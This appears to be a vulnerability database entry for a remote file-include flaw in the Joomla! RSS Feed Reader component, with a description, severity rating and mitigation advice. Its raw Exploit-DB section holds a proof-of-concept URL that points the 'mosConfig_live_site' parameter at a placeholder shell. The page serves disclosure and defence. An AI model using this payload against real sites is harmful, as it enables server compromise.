header-logo
Suggest Exploit
vendor:
Joomla! RSS Feed Reader
by:
Unknown
7.5
CVSS
HIGH
Remote File Include
CWE
Product Name: Joomla! RSS Feed Reader
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Joomla! RSS Feed Reader Remote File Include Vulnerability

The Joomla! RSS Feed Reader is vulnerable to a remote file-include vulnerability. This occurs due to insufficient sanitization of user-supplied input. An attacker can exploit this vulnerability by injecting malicious code into the 'mosConfig_live_site' parameter of the 'admin.wmtrssreader.php' file. Successful exploitation could allow the attacker to compromise the application and the underlying system, potentially leading to further attacks.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user-supplied input before using it in file inclusion operations. Additionally, keeping the Joomla! RSS Feed Reader and all other software up to date with the latest security patches is essential to prevent exploitation.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/25999/info

Webmaster-Tips.net Joomla! RSS Feed Reader is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.

Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

http://www.example.com/path/administrator/components/com_wmtrssreader/admin.wmtrssreader.php?mosConfig_live_site=sh3ll?

Navigation

Suggest Exploit

Services By CQR